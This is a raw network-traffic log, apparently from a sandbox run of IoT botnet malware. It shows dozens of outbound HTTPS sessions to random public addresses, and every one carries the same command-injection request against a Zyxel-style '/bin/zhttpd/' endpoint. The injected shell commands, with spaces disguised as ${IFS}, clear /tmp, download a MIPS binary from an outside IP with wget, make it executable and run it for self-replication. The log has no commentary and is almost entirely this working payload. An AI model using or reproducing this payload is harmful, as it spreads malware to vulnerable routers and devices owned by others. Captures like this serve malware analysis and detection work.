                                                      Feb 2, 2024 06:36:06.933566093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7769192.168.2.14375865.37.215.109443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.933600903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7770192.168.2.145986471.121.133.30443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.933634996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7771192.168.2.144770258.48.102.29443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.933660984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7772192.168.2.1457310120.1.220.204443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.933698893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7773192.168.2.144624237.190.135.26443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.933715105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7774192.168.2.143303892.53.186.86443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.933736086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7775192.168.2.144517223.231.93.41443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.933815002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7776192.168.2.1452554159.184.136.10443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.933898926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7777192.168.2.1432794108.6.5.162443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.933902979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7778192.168.2.144501284.205.77.236443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.933912992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7779192.168.2.1442686146.72.70.132443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.933912992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7780192.168.2.145126843.214.33.126443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.933921099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7781192.168.2.144743859.113.66.213443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.933919907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7782192.168.2.144043842.60.215.211443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.934011936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7783192.168.2.1436786142.147.44.214443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.934050083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7784192.168.2.145466876.10.40.78443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.934081078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7785192.168.2.1456044222.50.146.198443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.934144020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7786192.168.2.145617625.13.253.87443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.934170961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7787192.168.2.1451126222.10.54.249443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.934235096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7788192.168.2.1450584135.253.251.62443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.934273005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7789192.168.2.1439328181.129.62.158443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.934308052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7790192.168.2.1445476148.25.179.174443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.934330940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7791192.168.2.1454092151.154.15.12443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.934389114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7792192.168.2.144804249.22.95.225443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.934441090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7793192.168.2.1444210129.55.231.228443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.934480906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7794192.168.2.1440342178.215.237.179443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.934528112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7795192.168.2.1447398206.48.48.156443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.934559107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7796192.168.2.1437478117.213.155.255443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.934587002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7797192.168.2.1449044130.239.184.17443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.934612989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7798192.168.2.143647054.96.113.228443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.934658051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7799192.168.2.1453578102.67.202.189443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.934685946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7800192.168.2.143570296.64.229.254443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.934720039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7801192.168.2.144383298.171.160.244443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.934750080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7802192.168.2.145510447.3.227.172443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.934794903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7803192.168.2.143604247.51.134.203443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.934842110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7804192.168.2.1433536220.196.78.119443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.934876919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7805192.168.2.1442386165.79.77.38443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.934926987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7806192.168.2.145202684.19.125.234443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.934941053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7807192.168.2.1438784181.110.184.129443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.935005903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7808192.168.2.144770697.87.21.208443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.935045958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7809192.168.2.145822691.75.18.196443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.935080051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7810192.168.2.1435650197.157.61.106443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.935106039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7811192.168.2.144611265.86.211.63443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.935151100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7812192.168.2.145349457.204.202.66443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.935197115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7813192.168.2.145996437.197.63.80443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.935224056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7814192.168.2.1445358174.210.15.159443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.935254097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7815192.168.2.1447084174.224.164.18443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.935323000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7816192.168.2.1437796182.55.39.125443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.935355902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7817192.168.2.1457606111.200.126.253443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.935405970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7818192.168.2.1442896170.117.24.197443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.935460091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7819192.168.2.1440148149.94.152.231443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.935478926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7820192.168.2.1452564138.96.39.188443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.935528040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7821192.168.2.145727876.219.29.8443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.935559988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7822192.168.2.1459132107.17.249.213443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.935601950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7823192.168.2.1437914163.123.177.135443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.935642958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7824192.168.2.145398891.105.194.32443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.935694933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7825192.168.2.1458892199.168.138.68443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.935734987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7826192.168.2.1441748139.197.210.151443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.935776949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7827192.168.2.14566448.126.136.155443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.935807943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7828192.168.2.1446542140.179.145.112443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.935837984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7829192.168.2.14595322.166.178.113443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.935894012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7830192.168.2.1451856199.178.252.138443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.935931921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7831192.168.2.144137448.153.116.73443
                                                      TimestampBytes transferredDirectionData
